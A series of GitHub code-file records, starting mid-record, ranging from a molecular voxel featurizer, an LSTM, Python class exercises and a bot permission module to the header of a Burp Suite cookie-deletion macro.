'bos', 'eos', '5', 'Y', ')', 'Z', '[', ']', '-', \n 'S', '1', 'O', 'N', \"'\", ' ', 'C', '(', 'n', 'c', '#', 's', '6', \n 'X', '4', ',', '2', 'o', 'F', '=', '3', '.', 'I', '/', '+', '\\\\', '@', 'H', 'P']\n# voc_set=['pad', 'bos', 'eos', 'Y', '-', 'o', '[', ' ', 'N', 'P', '1', 's', '8', '7', '(', '5', \n# 'C', '3', 'X', 'n', 'Z', 'c', 'H', '+', ',', ')', \"'\", 'S', 'O', '4', ']', '#', '2', 'I', 'F', '=', '6','9','@'] \nvocab_i2c_v1 = {i: x for i, x in enumerate(voc_set)}\nvocab_c2i_v1 = {vocab_i2c_v1[i]: i for i in vocab_i2c_v1}\n\nclass Featurizer():\n \"\"\"\n This class scirpt is highly referenced to tfbio\n https://gitlab.com/cheminfIBB/tfbio\n Calcaulates atomic features for molecules. Features can encode atom type,\n native pybel properties or any property defined with SMARTS patterns\n \"\"\"\n def __init__(self, atom_codes=None, atom_labels=None,\n named_properties=None, save_molecule_codes=True,\n custom_properties=None, smarts_properties=None,\n smarts_labels=None):\n\n # Remember namse of all features in the correct order\n self.FEATURE_NAMES = []\n\n if atom_codes is not None:\n if not isinstance(atom_codes, dict):\n raise TypeError('Atom codes should be dict, got %s instead'\n % type(atom_codes))\n codes = set(atom_codes.values())\n for i in range(len(codes)):\n if i not in codes:\n raise ValueError('Incorrect atom code %s' % i)\n\n self.NUM_ATOM_CLASSES = len(codes)\n self.ATOM_CODES = atom_codes\n if atom_labels is not None:\n if len(atom_labels) != self.NUM_ATOM_CLASSES:\n raise ValueError('Incorrect number of atom labels: '\n '%s instead of %s'\n % (len(atom_labels), self.NUM_ATOM_CLASSES))\n else:\n atom_labels = ['atom%s' % i for i in range(self.NUM_ATOM_CLASSES)]\n self.FEATURE_NAMES += atom_labels\n else:\n self.ATOM_CODES = {}\n\n metals = ([3, 4, 11, 12, 13] + list(range(19, 32))\n + list(range(37, 51)) + list(range(55, 84))\n + list(range(87, 104)))\n\n # List of tuples (atomic_num, class_name) with atom types to encode.\n atom_classes = [\n (5, 'B'),\n (6, 'C'),\n (7, 'N'),\n (8, 'O'),\n (15, 'P'),\n (16, 'S'),\n (34, 'Se'),\n ([9, 17, 35, 53], 'halogen'),\n (metals, 'metal')\n ]\n\n for code, (atom, name) in enumerate(atom_classes):\n if type(atom) is list:\n for a in atom:\n self.ATOM_CODES[a] = code\n else:\n self.ATOM_CODES[atom] = code\n self.FEATURE_NAMES.append(name)\n\n self.NUM_ATOM_CLASSES = len(atom_classes)\n\n if named_properties is not None:\n if not isinstance(named_properties, (list, tuple, np.ndarray)):\n raise TypeError('named_properties must be a list')\n allowed_props = [prop for prop in dir(pybel.Atom)\n if not prop.startswith('__')]\n for prop_id, prop in enumerate(named_properties):\n if prop not in allowed_props:\n raise ValueError(\n 'named_properties must be in pybel.Atom attributes,'\n ' %s was given at position %s' % (prop_id, prop)\n )\n self.NAMED_PROPS = named_properties\n else:\n # pybel.Atom properties to save\n self.NAMED_PROPS = ['hyb', 'heavyvalence', 'heterovalence',\n 'partialcharge']\n self.FEATURE_NAMES += self.NAMED_PROPS\n\n if not isinstance(save_molecule_codes, bool):\n raise TypeError('save_molecule_codes should be bool, got %s '\n 'instead' % type(save_molecule_codes))\n self.save_molecule_codes = save_molecule_codes\n if save_molecule_codes:\n # Remember if an atom belongs to the ligand or to the protein\n self.FEATURE_NAMES.append('molcode')\n\n self.CALLABLES = []\n if custom_properties is not None:\n for i, func in enumerate(custom_properties):\n if not callable(func):\n raise TypeError('custom_properties should be list of'\n ' callables, got %s instead' % type(func))\n name = getattr(func, '__name__', '')\n if name == '':\n name = 'func%s' % i\n self.CALLABLES.append(func)\n self.FEATURE_NAMES.append(name)\n\n if smarts_properties is None:\n # SMARTS definition for other properties\n self.SMARTS = [\n '[#6+0!$(*~[#7,#8,F]),SH0+0v2,s+0,S^3,Cl+0,Br+0,I+0]',\n '[a]',\n '[!$([#1,#6,F,Cl,Br,I,o,s,nX3,#7v5,#15v5,#16v4,#16v6,*+1,*+2,*+3])]',\n '[!$([#6,H0,-,-2,-3]),$([!H0;#7,#8,#9])]',\n '[r]'\n ]\n smarts_labels = ['hydrophobic', 'aromatic', 'acceptor', 'donor',\n 'ring']\n elif not isinstance(smarts_properties, (list, tuple, np.ndarray)):\n raise TypeError('smarts_properties must be a list')\n else:\n self.SMARTS = smarts_properties\n\n if smarts_labels is not None:\n if len(smarts_labels) != len(self.SMARTS):\n raise ValueError('Incorrect number of SMARTS labels: %s'\n ' instead of %s'\n % (len(smarts_labels), len(self.SMARTS)))\n else:\n smarts_labels = ['smarts%s' % i for i in range(len(self.SMARTS))]\n\n # Compile patterns\n self.compile_smarts()\n self.FEATURE_NAMES += smarts_labels\n\n def compile_smarts(self):\n self.__PATTERNS = []\n for smarts in self.SMARTS:\n self.__PATTERNS.append(pybel.Smarts(smarts))\n\n def encode_num(self, atomic_num):\n \"\"\"Encode atom type with a binary vector. If atom type is not included in\n the `atom_classes`, its encoding is an all-zeros vector.\n \"\"\"\n\n if not isinstance(atomic_num, int):\n raise TypeError('Atomic number must be int, %s was given'\n % type(atomic_num))\n\n encoding = np.zeros(self.NUM_ATOM_CLASSES)\n try:\n encoding[self.ATOM_CODES[atomic_num]] = 1.0\n except:\n pass\n return encoding\n\n def find_smarts(self, molecule):\n \"\"\"Find atoms that match SMARTS patterns.\n \"\"\"\n\n if not isinstance(molecule, pybel.Molecule):\n raise TypeError('molecule must be pybel.Molecule object, %s was given'\n % type(molecule))\n\n features = np.zeros((len(molecule.atoms), len(self.__PATTERNS)))\n\n for (pattern_id, pattern) in enumerate(self.__PATTERNS):\n atoms_with_prop = np.array(list(*zip(*pattern.findall(molecule))),\n dtype=int) - 1\n features[atoms_with_prop, pattern_id] = 1.0\n return features\n\n def get_features(self, molecule, molcode=None):\n \"\"\"Get coordinates and features for all heavy atoms in the molecule.\n \"\"\"\n\n if not isinstance(molecule, pybel.Molecule):\n raise TypeError('molecule must be pybel.Molecule object,'\n ' %s was given' % type(molecule))\n if molcode is None:\n if self.save_molecule_codes is True:\n raise ValueError('save_molecule_codes is set to True,'\n ' you must specify code for the molecule')\n elif not isinstance(molcode, (float, int)):\n raise TypeError('motlype must be float, %s was given'\n % type(molcode))\n\n coords = []\n features = []\n heavy_atoms = []\n\n for i, atom in enumerate(molecule):\n # ignore hydrogens and dummy atoms (they have atomicnum set to 0)\n # print('atom:',atom)\n # print('atom.atomicnum:',atom.atomicnum)\n if atom.atomicnum > 1:\n heavy_atoms.append(i)\n coords.append(atom.coords)\n\n features.append(np.concatenate((\n self.encode_num(atom.atomicnum),\n [atom.__getattribute__(prop) for prop in self.NAMED_PROPS],\n [func(atom) for func in self.CALLABLES],\n )))\n\n coords = np.array(coords, dtype=np.float32)\n features = np.array(features, dtype=np.float32)\n if self.save_molecule_codes:\n features = np.hstack((features,\n molcode * np.ones((len(features), 1))))\n features = np.hstack([features,\n self.find_smarts(molecule)[heavy_atoms]])\n\n if np.isnan(features).any():\n raise RuntimeError('Got NaN when calculating features')\n\n return coords, features\n\n\ndef rotation_matrix(axis, theta):\n \"\"\"Counterclockwise rotation about a given axis by theta radians\"\"\"\n\n if not isinstance(axis, (np.ndarray, list, tuple)):\n raise TypeError('axis must be an array of floats of shape (3,)')\n try:\n axis = np.asarray(axis, dtype=np.float)\n except ValueError:\n raise ValueError('axis must be an array of floats of shape (3,)')\n\n if axis.shape != (3,):\n raise ValueError('axis must be an array of floats of shape (3,)')\n\n if not isinstance(theta, (float, int)):\n raise TypeError('theta must be a float')\n\n axis = axis / sqrt(np.dot(axis, axis))\n a = cos(theta / 2.0)\n b, c, d = -axis * sin(theta / 2.0)\n aa, bb, cc, dd = a * a, b * b, c * c, d * d\n bc, ad, ac, ab, bd, cd = b * c, a * d, a * c, a * b, b * d, c * d\n return np.array([[aa + bb - cc - dd, 2 * (bc + ad), 2 * (bd - ac)],\n [2 * (bc - ad), aa + cc - bb - dd, 2 * (cd + ab)],\n [2 * (bd + ac), 2 * (cd - ab), aa + dd - bb - cc]])\n\n\n # Create matrices for all possible 90* rotations of a box\n ROTATIONS = [rotation_matrix([1, 1, 1], 0)]\n\n # about X, Y and Z - 9 rotations\n for a1 in range(3):\n for t in range(1, 4):\n axis = np.zeros(3)\n axis[a1] = 1\n theta = t * pi / 2.0\n ROTATIONS.append(rotation_matrix(axis, theta))\n\n # about each face diagonal - 6 rotations\n for (a1, a2) in combinations(range(3), 2):\n axis = np.zeros(3)\n axis[[a1, a2]] = 1.0\n theta = pi\n ROTATIONS.append(rotation_matrix(axis, theta))\n axis[a2] = -1.0\n ROTATIONS.append(rotation_matrix(axis, theta))\n\n # about each space diagonal - 8 rotations\n for t in [1, 2]:\n theta = t * 2 * pi / 3\n axis = np.ones(3)\n ROTATIONS.append(rotation_matrix(axis, theta))\n for a1 in range(3):\n axis = np.ones(3)\n axis[a1] = -1\n ROTATIONS.append(rotation_matrix(axis, theta))\n\n\ndef rotate(coords, rotation):\n \"\"\"Rotate coordinates by a given rotation\n \"\"\"\n\n global ROTATIONS\n\n if not isinstance(coords, (np.ndarray, list, tuple)):\n raise TypeError('coords must be an array of floats of shape (N, 3)')\n try:\n coords = np.asarray(coords, dtype=np.float)\n except ValueError:\n raise ValueError('coords must be an array of floats of shape (N, 3)')\n shape = coords.shape\n if len(shape) != 2 or shape[1] != 3:\n raise ValueError('coords must be an array of floats of shape (N, 3)')\n\n if isinstance(rotation, int):\n if rotation >= 0 and rotation < len(ROTATIONS):\n return np.dot(coords, ROTATIONS[rotation])\n else:\n raise ValueError('Invalid rotation number %s!' % rotation)\n elif isinstance(rotation, np.ndarray) and rotation.shape == (3, 3):\n return np.dot(coords, rotation)\n\n else:\n raise ValueError('Invalid rotation %s!' % rotation)\n\n\n# TODO: add make_grid variant for GPU\nfeaturizer = Featurizer()\ndef make_grid(coords, features, grid_resolution=1.0, max_dist=7.5):\n \"\"\"Convert atom coordinates and features represented as 2D arrays into a\n \n -------\n coords: np.ndarray, shape = (M, M, M, F)\n 4D array with atom properties distributed in 3D space. M is equal to\n 2 * `max_dist` / `grid_resolution` + 1\n \"\"\"\n\n try:\n coords = np.asarray(coords, dtype=np.float64)\n except ValueError:\n raise ValueError('coords must be an array of floats of shape (N, 3)')\n c_shape = coords.shape\n if len(c_shape) != 2 or c_shape[1] != 3:\n raise ValueError('coords must be an array of floats of shape (N, 3)')\n\n N = len(coords)\n try:\n features = np.asarray(features, dtype=np.float64)\n except ValueError:\n raise ValueError('features must be an array of floats of shape (N, F)')\n f_shape = features.shape\n if len(f_shape) != 2 or f_shape[0] != N:\n raise ValueError('features must be an array of floats of shape (N, F)')\n\n if not isinstance(grid_resolution, (float, int)):\n raise TypeError('grid_resolution must be float')\n if grid_resolution <= 0:\n raise ValueError('grid_resolution must be positive')\n\n if not isinstance(max_dist, (float, int)):\n raise TypeError('max_dist must be float')\n if max_dist <= 0:\n raise ValueError('max_dist must be positive')\n\n num_features = f_shape[1]\n max_dist = float(max_dist)\n grid_resolution = float(grid_resolution)\n\n box_size = math.ceil(2 * max_dist / grid_resolution + 1)\n\n # move all atoms to the neares grid point\n grid_coords = (coords + max_dist) / grid_resolution\n grid_coords = grid_coords.round().astype(int)\n\n # remove atoms outside the box\n in_box = ((grid_coords >= 0) & (grid_coords < box_size)).all(axis=1)\n grid = np.zeros((1, box_size, box_size, box_size, num_features),\n dtype=np.float32)\n for (x, y, z), f in zip(grid_coords[in_box], features[in_box]):\n grid[0, x, y, z] += f\n\n return grid\ndef get_3d_grid(input):\n '''\n Generate the 3d grid of nparray format of\n source data (zinc) and target data (binding complexes)\n mode: 1 for target data; 0 for source data \n input: in mode 1, means the the FODER path of pdb complexes(./pdb); \n in mode 0, means the FILES path of smiles (./zinc.csv)\n output: save path of training data (./source.npz)\n pki_path: the FILES path of pkis (./data/pkis.csv) \n'''\n\n charge_column = featurizer.FEATURE_NAMES.index('partialcharge')\n grid_in = []\n # lists = []\n # lists.append(input)\n # i = input\n for i in input:\n i=pybel.readstring('smi',i)\n crds, fea= featurizer.get_features(i,1.0)\n x=make_grid(crds, fea)\n x = np.vstack(x)\n \n x[..., charge_column] /= 0.425\n # print('x.shape:',x.shape)\n # grid_in.append(x)\n # print(len(grid_in))\n grid_in=np.array(x)\n\n # print('grid_in:',grid_in.shape)\n grid_in=grid_in.swapaxes(0,3)\n \n return grid_in\n \n\ndef generate_representation_v1(smile):\n \"\"\"\n Generate voxelized and string representation of a molecule\n \"\"\"\n # Convert smile to 3D structure\n charge_column = featurizer.FEATURE_NAMES.index('partialcharge')\n grid_in = []\n lists = []\n smile_str = list(smile)\n end_token = smile_str.index(2)\n smile_str = \"\".join([vocab_i2c_v1[i] for i in smile_str[1:end_token]])\n smile_str = smile_str.replace(\"X\", \"Cl\").replace(\"Y\", \"[nH]\").replace(\"Z\", \"Br\")\n\n lists=[]\n lists.append(smile_str)\n grid_in = get_3d_grid(lists)\n \n return torch.Tensor(grid_in), torch.Tensor(smile), end_token + 1\n\n\ndef gather_fn(in_data):\n \"\"\"\n Collects and creates a batch.\n \"\"\"\n # Sort a data list by smiles length (descending order)\n in_data.sort(key=lambda x: x[2], reverse=True)\n images, smiles, lengths = zip(*in_data)\n\n images = torch.stack(images, 0) # Stack images\n\n # Merge smiles (from tuple of 1D tensor to 2D tensor).\n # lengths = [len(smile) for smile in smiles]\n targets = torch.zeros(len(smiles), max(lengths)).long()\n for i, smile in enumerate(smiles):\n end = lengths[i]\n targets[i, :end] = smile[:end]\n return images, targets, lengths\n\n\nclass Batch_prep:\n def __init__(self, n_proc=6, mp_pool=None):\n if mp_pool:\n self.mp = mp_pool\n elif n_proc > 1:\n self.mp = multiprocessing.Pool(n_proc)\n else:\n raise NotImplementedError(\"Use multiprocessing for now!\")\n\n def transform_data(self, smiles):\n inputs = self.mp.map(generate_representation_v1, smiles)\n\n # Sometimes representation generation fails\n inputs = list(filter(lambda x: x is not None, inputs))\n return gather_fn(inputs)\n\n\ndef queue_datagen(smiles, batch_size=32, n_proc=12, mp_pool=None):\n \"\"\"\n Continuously produce representations.\n \"\"\"\n \n \n n_batches = math.ceil(len(smiles) / batch_size)\n sh_indencies = np.arange(len(smiles))\n\n my_batch_prep = Batch_prep(n_proc=n_proc, mp_pool=mp_pool)\n\n while True:\n np.random.shuffle(sh_indencies)\n for i in range(n_batches):\n batch_idx = sh_indencies[i * batch_size:(i + 1) * batch_size]\n print('smiles[batch_idx]:',smiles[batch_idx].shape)\n yield my_batch_prep.transform_data(smiles[batch_idx])\n\n","repo_name":"renyongqi529/DNMG","sub_path":"data_generator.py","file_name":"data_generator.py","file_ext":"py","file_size_in_byte":17943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2591553350","text":"from court import Court\nfrom typing import Optional\n\n\nclass Stadium(Court):\n __name: str\n __common_name: Optional[str]\n __capacity: int\n\n def __init__(self, width=68.0, length=150.0, address: str = '', year_built: int = 0, name: str = '',\n common_name: Optional[str] = '', capacity: int = 0) -> None:\n super().__init__(width, length, address, year_built)\n self.__name = name\n self.__common_name = common_name\n if capacity >= 0:\n self.__capacity = capacity\n\n if capacity < 0:\n self.__capacity = 0\n\n @property\n def name(self) -> str:\n return self.__name\n\n @name.setter\n def name(self, value: str) -> None:\n self.__name = value\n\n @property\n def common_name(self) -> str:\n return self.__common_name\n\n @common_name.setter\n def common_name(self, value: str) -> None:\n self.__common_name = value\n\n @property\n def capacity(self) -> int:\n return self.__capacity\n\n @capacity.setter\n def capacity(self, value: int) -> None:\n self.__capacity = value\n\n def __eq__(self, other: 'Stadium') -> bool:\n if self.area() == other.area() and self.capacity == other.capacity:\n return True\n return False\n\n def __ne__(self, other: 'Stadium') -> bool:\n if self.area() != other.area() and self.capacity != other.capacity:\n return True\n return False\n\n def __repr__(self):\n if self.common_name is not None:\n return f'Boisko wybudowane w roku {self.year_built}, ' \\\n f'o długości {self.length} i szerokości {self.width} metrów, ' \\\n f'Pole powierzchni: {self.area()} mkw.' \\\n f'Adres: {self.address}' \\\n f'Nazwa: {self.name}' \\\n f'Nazwa zwyczajowa: {self.common_name}' \\\n f'Pojemność stadionu: {self.capacity}'\n else:\n return f'Boisko wybudowane w roku {self.year_built}, ' \\\n f'o długości {self.length} i szerokości {self.width} metrów, ' \\\n f'Pole powierzchni: {self.area()} mkw.' \\\n f'Adres: {self.address}' \\\n f'Nazwa: {self.name}' \\\n f'Pojemność stadionu: {self.capacity}'\n","repo_name":"HubertBednarczyk/ProgramowanieObiektowe","sub_path":"Cwiczenia/K1-162135/stadium.py","file_name":"stadium.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29427106449","text":"def numero_perfecto(n):\n c=1\n sm=0\n while(c!=n):\n if(n%c==0):\n sm=sm+c\n c=c+1\n if(sm==n):\n return True\n else:\n return False\nif __name__ == \"_main_\":\n n=eval(input(\"Ingrese su numero: \"))\n if(n_perfecto(n)):\n print(\"El numero 0 es perfecto\".format(n))\n else:\n print(\"El numero 0 no es perfecto\".format(n))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej3/tema2_ej3_98d2369f77937e21d0d86c004d1355f1.py","file_name":"tema2_ej3_98d2369f77937e21d0d86c004d1355f1.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17994888899","text":"import tensorflow as tf\n\nclass LSTM_timeseries(tf.Module):\n def __init__(self, nodes_in, units_hidden, nodes_out, n_pred=1):\n self.units_hidden = units_hidden\n self.nodes_in = nodes_in\n self.nodes_out = nodes_out\n self.n_pred = n_pred\n \n self.W_i = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_i') \n self.U_i = tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_i')\n self.b_i = tf.Variable(tf.zeros([self.units_hidden]),name='b_i')\n self.W_f = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_f')\n self.U_f = tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_f')\n self.b_f = tf.Variable(tf.zeros([self.units_hidden]),name='b_f')\n self.W_o = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_o')\n self.U_o= tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_o')\n self.b_o = tf.Variable(tf.zeros([self.units_hidden]),name='b_o')\n self.W_c = tf.Variable(tf.zeros([self.nodes_in, self.units_hidden]),name='w_c')\n self.U_c = tf.Variable(tf.zeros([self.units_hidden, self.units_hidden]),name='u_c')\n self.b_c = tf.Variable(tf.zeros([self.units_hidden]),name='b_c')\n # output layer\n self.W_ol = tf.Variable(tf.random.truncated_normal([self.units_hidden, self.nodes_out], mean=0, stddev=.01),\n name='w_ol')\n self.b_ol = tf.Variable(tf.random.truncated_normal([self.nodes_out], mean=0, stddev=.01),\n name='b_ol')\n \n \n def forward_onestep(self, previous_hidden_memory_tuple, x):\n # runs one time step\n previous_hidden_state, c_prev = tf.unstack(previous_hidden_memory_tuple)\n\n i = tf.sigmoid( tf.matmul(x, self.W_i) +\n tf.matmul(previous_hidden_state, self.U_i) + self.b_i)\n\n f = tf.sigmoid( tf.matmul(x, self.W_f) +\n tf.matmul(previous_hidden_state, self.U_f) + self.b_f)\n\n o = tf.sigmoid( tf.matmul(x, self.W_o) +\n tf.matmul(previous_hidden_state, self.U_o) + self.b_o)\n\n c_ = tf.nn.tanh(tf.matmul(x, self.W_c) +\n tf.matmul(previous_hidden_state, self.U_c) + self.b_c)\n\n # Final Memory cell\n c = f * c_prev + i * c_\n current_hidden_state = o * tf.nn.tanh(c)\n\n return tf.stack([current_hidden_state, c])\n \n def output(self, state_hidden):\n output = tf.nn.relu(tf.matmul(state_hidden, self.W_ol) + self.b_ol) #shape (size_seq, size_batch, nodes_out)\n return output\n \n def forward(self, X, training=True):\n \n self._inputs = X #shape (batch, size_seq, self.nodes_in)\n initial_hidden = self._inputs[:, 0, :]\n initial_hidden = tf.matmul(initial_hidden, \n tf.zeros([self.nodes_in, self.units_hidden], dtype=tf.dtypes.float32))\n self.initial_hidden_c = tf.stack([initial_hidden, initial_hidden])\n # transforming to shape (size_seq, size_batch, nodes_in) for scan function\n self.input_scan = tf.transpose(self._inputs, perm=[1, 0, 2])\n \n all_hidden_states = tf.scan(self.forward_onestep, self.input_scan, \n initializer=self.initial_hidden_c, \n name='states') #shape (size_seq, 2, size_batch, units_hidden)\n \n all_hidden_states = all_hidden_states[:, 0, :, :] #shape (size_seq, size_batch, units_hidden)\n \n outputs = tf.map_fn(self.output, all_hidden_states) #shape (size_seq, size_batch, nodes_out)\n \n return tf.transpose(outputs[-self.n_pred:], perm=[1,0,2]) #just output of the last\n\n","repo_name":"DominikSpringer/LSTM","sub_path":"lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"48124104776","text":"import tkinter\nimport threading\nclass MyTkApp(threading.Thread):\n def __init__(self):\n threading.Thread.__init__(self)\n self.start()\n def callback(self):\n self.root.quit()\n def run(self):\n self.root=tkinter.Tk()\n self.root.protocol(\"WM_DELETE_WINDOW\", self.callback)\n self.s = tkinter.StringVar()\n self.s.set('Foo')\n l = tkinter.Label(self.root,textvariable=self.s)\n l.pack()\n self.root.mainloop()\napp = MyTkApp()\nprint ('now can continue running code while mainloop runs')\n","repo_name":"apdaza/universidad-ejercicios","sub_path":"python/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"34084639650","text":"\"\"\"\n\n\"\"\"\n\nfrom . import values\nfrom . import plog\nfrom typing import Any, NoReturn\n\nlog = plog.DEFAULT_LOG\n\n\nclass PermissionGroup:\n __user_list: list[str]\n\n def __init__(self, name: str, p: int = values.DEFAULT_P):\n \"\"\"\n pbot用来描述权限组的根类\n :param p: 权限值,最小为1,最大为_pbot.__values.MAX_P所定义的值。\n \"\"\"\n plog.DEFAULT_LOG.info(f\"PermissionGroup初始化 Start(Name:{type(self).__name__})\")\n values.pg_list.append(self)\n self.__user_list = []\n self.__p = p\n self.name = name\n\n def __del__(self):\n if self in values.pg_list:\n values.pg_list.remove(self)\n plog.DEFAULT_LOG.info(f\"{self.name}已卸载\")\n\n @log.catch(level=\"WARNING\")\n def set_p(self, p: int) -> bool:\n \"\"\"\n 设置权限组权限\n :param p: 权限值\n :return: 布尔值,用来描述修改权限是否成功\n \"\"\"\n plog.DEFAULT_LOG.info(f\"{self.name}设置权限{p}\")\n if type(p) != type(1):\n plog.DEFAULT_LOG.warning(f\"{p}不为整值\")\n return False\n if p < 1 or p > values.MAX_P:\n plog.DEFAULT_LOG.warning(f\"{p}不是一个可用的值\")\n return False\n self.__p = p\n plog.DEFAULT_LOG.success(f\"成功将{self.name}设置权限为{self.__p}\")\n return True\n\n def get_p(self) -> int:\n \"\"\"\n 获取权限组权限\n :return: 权限组权限\n \"\"\"\n return self.__p\n\n @log.catch(level=\"WARNING\")\n def add_user(self, user_id: str) -> bool:\n \"\"\"\n 为权限组添加用户\n :param user_id: 用户id\n :return: 布尔值,描述是否成功\n \"\"\"\n plog.DEFAULT_LOG.info(f\"添加用户 {user_id}\")\n if user_id in self.__user_list:\n plog.DEFAULT_LOG.warning(\"已添加过的用户\")\n return False\n self.__user_list.append(str(user_id))\n plog.DEFAULT_LOG.success(\"成功添加用户\")\n return True\n\n def del_user(self, user_id: str) -> bool:\n \"\"\"\n 为权限组删除用户\n :param user_id: 用户id\n :return: 布尔值,描述是否成功\n \"\"\"\n plog.DEFAULT_LOG.info(f\"删除用户 {user_id}\")\n if user_id in self.__user_list:\n self.__user_list.remove(user_id)\n plog.DEFAULT_LOG.success(f\"成功删除用户 {user_id}\")\n return True\n else:\n plog.DEFAULT_LOG.warning(f\"未找到此用户 {user_id}\")\n return False\n\n def find_user(self, user_id: str) -> bool:\n \"\"\"\n 从权限组搜索用户\n :param user_id: 用户id\n :return: 布尔值\n \"\"\"\n plog.DEFAULT_LOG.info(f\"搜索用户 {user_id}\")\n if user_id in self.__user_list:\n plog.DEFAULT_LOG.success(f\"找到用户 {user_id}\")\n return True\n else:\n plog.DEFAULT_LOG.warning(f\"未找到此用户 {user_id}\")\n return False\n\n def get_users(self) -> list:\n return self.__user_list\n\n def save(self) -> dict[any]:\n \"\"\"\n 保存权限组内容\n :return: 字典,存储该权限组数据\n \"\"\"\n data = {\n \"Type\": \"PermissionGroup\",\n \"Name\": self.name,\n \"Permission\": self.__p,\n \"Users\": self.__user_list,\n }\n return data\n\n @log.catch(level=\"WARNING\")\n def load(self, data: dict[any]) -> bool:\n \"\"\"\n 加载权限组数据\n :param data: 使用save保存的字典数据\n :return: 布尔值\n \"\"\"\n log.info(f\"{self.name}加载配置\\n{data}\")\n if data[\"Type\"] != \"PermissionGroup\":\n log.warning(\"不支持的数据\")\n return False\n self.name = data[\"Name\"]\n self.__p = data[\"Permission\"]\n self.__user_list = data[\"Users\"]\n log.success(\"加载成功\")\n return True\n\n\nclass EventClass:\n __hooks: list[Any]\n\n def __init__(self, name: str):\n \"\"\"\n 事件基类,用于表述pbot所以事件\n :param name: 事件名称\n \"\"\"\n log.info(f\"创建事件 {name}\")\n self.__hooks = []\n self.name = name\n\n @classmethod\n @log.catch(level=\"WARNING\")\n def __remind(cls, hook, **kwargs):\n \"\"\"\n 调用钩子函数的内部实现\n :param hook: 钩子函数\n :param kwargs: 参数\n \"\"\"\n hook(**kwargs)\n\n @log.catch(level=\"WARNING\")\n def add_hook(self, hook: Any, name: str):\n \"\"\"\n 添加钩子函数\n :param name: 钩子名称,仅用于日志\n :param hook: 钩子函数\n \"\"\"\n log.info(f\"{self.name}事件添加钩子{name}\")\n self.__hooks.append({name: hook})\n\n @log.catch(level=\"WARNING\")\n def del_hook(self, name: str) -> any:\n \"\"\"\n 删除钩子函数\n :param name: 钩子名称\n :return: 删除的钩子函数\n \"\"\"\n log.info(f\"{self.name}事件删除钩子 {name}\")\n if name in self.__hooks:\n _ = self.__hooks[name]\n del self.__hooks[name]\n log.success(f\"{self.name}事件成功删除钩子 {name}\")\n return _\n else:\n log.warning(f\"{self.name}事件未找到 {name} 钩子\")\n\n def remind_hooks(self, **kwargs) -> NoReturn:\n \"\"\"\n 调用钩子函数\n :param kwargs: 调用钩子函数的参数\n \"\"\"\n log.info(\"调用钩子函数\")\n for i, y in self.__hooks.items():\n log.info(f\"{self.name}事件调用钩子{i}\")\n self.__remind(y, **kwargs)\n","repo_name":"hiyms/pbot","sub_path":"_pbot/pbot_cl.py","file_name":"pbot_cl.py","file_ext":"py","file_size_in_byte":5697,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4634323279","text":"command = input()\nbalance = 0\n\nwhile command != \"NoMoreMoney\":\n command = float(command)\n\n if command < 0:\n print(f\"Invalid operation!\")\n break\n\n balance += command\n print(f\"Increase: {command:.2f}\")\n command = input()\n\nprint(f\"Total: {balance:.2f}\")\n","repo_name":"4um3n/SoftUni-Courses","sub_path":"Programing-Basics-With-Python/0-4-While-Loops/Lab/acount_balace.py","file_name":"acount_balace.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"24706810071","text":"import expr\n\nclass operationMixin:\n @staticmethod\n def add(left, right):\n if left == 0:\n return right\n if right == 0:\n return left\n\n return expr.ExprTree(left, \"+\", right)\n\n @staticmethod\n def mul(left, right):\n if left == 0:\n return 0\n if right == 0:\n return 0\n\n if left == 1:\n return right\n if right == 1:\n return left\n\n return expr.ExprTree(left, \"*\", right)\n\n @staticmethod\n def pow(base, exp):\n if exp == 0:\n return 1\n if base == 0:\n return 0\n if exp == 1:\n return base\n if base == 1:\n return 1\n \n if expr.isTree(base):\n if base.oper == \"^\":\n return expr.ExprTree(base.node1, \"^\", (base.node2 * exp))\n\n return expr.ExprTree(base, \"^\", exp)\n","repo_name":"TimothySamson/pygebra","sub_path":"operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20670077639","text":"\"\"\"\r\nBy: InfoSecV9Y\r\nPurpose: This script is used to delete the cookie matched with reg_exp pattern from Burp Cookie Jar.\r\nPre-Conditions: This script needs to run as a Macro using Session Handling rules.\r\nVersion: 0.3\r\nLast modified: 2021.Oct.18 08:00 PM\r\nKnown Bugs:\r\nUpto 0.2: re.IGNORECASE is not available\r\n\r\nPending Enhancements:\r\n\r\nUpdates:\r\n0.3: Trying to ignore deleting the previous cookie from macro (optimising)\r\n0.2: Multiple regex patterns can be added\r\n0.1: Pattern based cookie will be removed for only one pattern at a time\r\n\r\nRef:\r\n This script source was from:\r\n Script Source:\r\n 1.https://gist.github.com/ryan-wendel/ec69e77dcac6410f6535d6f9278eabf7\r\n 2.https://github.com/HannahLaw-Portswigger/DeleteCookies\r\n Blog: https://www.ryanwendel.com/2019/09/27/application-enumeration-tips-using-aquatone-and-burp-suite/\r\n 3.https://github.com/justm0rph3u5/BurpSuite-CustomHeader\r\n Blog: https://justm0rph3u5.medium.com/automating-burp-suite-4-understanding-and-customising-custom-header-from-response-via-burp-macro-214332dda012\r\n\r\n\r\n Portswigger response:\r\n 